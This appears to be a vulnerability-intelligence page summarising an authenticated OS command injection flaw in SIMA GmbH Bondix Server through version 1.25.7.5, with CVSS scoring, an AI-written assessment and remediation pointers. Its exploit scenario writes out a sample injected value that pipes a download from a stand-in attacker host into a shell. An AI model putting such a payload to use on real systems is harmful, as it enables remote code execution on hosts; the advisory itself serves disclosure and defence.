Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:L/U:Amber
Network-reachable management interface (AV:N) with no special conditions (AC:L) but requires high-privilege configuration-write access (PR:H); no user interaction, and shell execution yields full host CIA impact.
Primary rating from Vendor (NCSC.ch).
CVSS VectorVendor: NCSC.ch
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:L/U:Amber
Lifecycle Timeline
2DescriptionCVE.org
OS command injection in the environment and tunnel configuration functionality in SIMA GmbH Bondix through version 1.25.7.5 on Linux allows an authenticated attacker with configuration write access to execute arbitrary operating-system commands via crafted configuration values passed to server-side scripts.
AnalysisAI
Authenticated OS command injection in SIMA GmbH Bondix Server through 1.25.7.5 on Linux allows an attacker with configuration write privileges to execute arbitrary operating-system commands by supplying crafted values in the environment and tunnel configuration that are passed unsanitized to server-side scripts. The flaw was reported by NCSC.ch and carries a CVSS 4.0 base score of 8.6 (High); no public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires (1) network reachability to the Bondix Server management interface, (2) authenticated access with configuration-write permission for the environment and/or tunnel configuration sections, and (3) a vulnerable installation at or below version 1.25.7.5 on Linux. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H) accurately reflects a high-privilege but network-reachable flaw: full CIA impact on the host but gated by PR:H, meaning the attacker must already hold configuration-write authority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained Bondix Server administrator credentials - for example through phishing, credential reuse, or insider access - logs into the management interface and edits an environment or tunnel configuration field, embedding shell metacharacters such as '; curl http://attacker/x | sh'. When the server-side script consumes that value, the injected command runs in the Bondix process context, giving the attacker arbitrary code execution on the underlying Linux host; no public exploit identified at time of analysis. |
| Remediation | Upgrade Bondix Server to the fixed release identified in the vendor advisory at https://wiki.bondix.dev/wiki/Security_Advisories#CVE-2026-12104_%E2%80%94_Authenticated_OS_Command_Injection_in_Bondix and cross-referenced in the release notes at https://wiki.bondix.dev/wiki/Downloads#Release_Notes (exact patched version not enumerated in the provided intelligence - confirm with the vendor changelog before deployment). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all Bondix Server installations including version numbers and identify personnel with configuration write access. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38031
GHSA-9jwh-589c-mpc6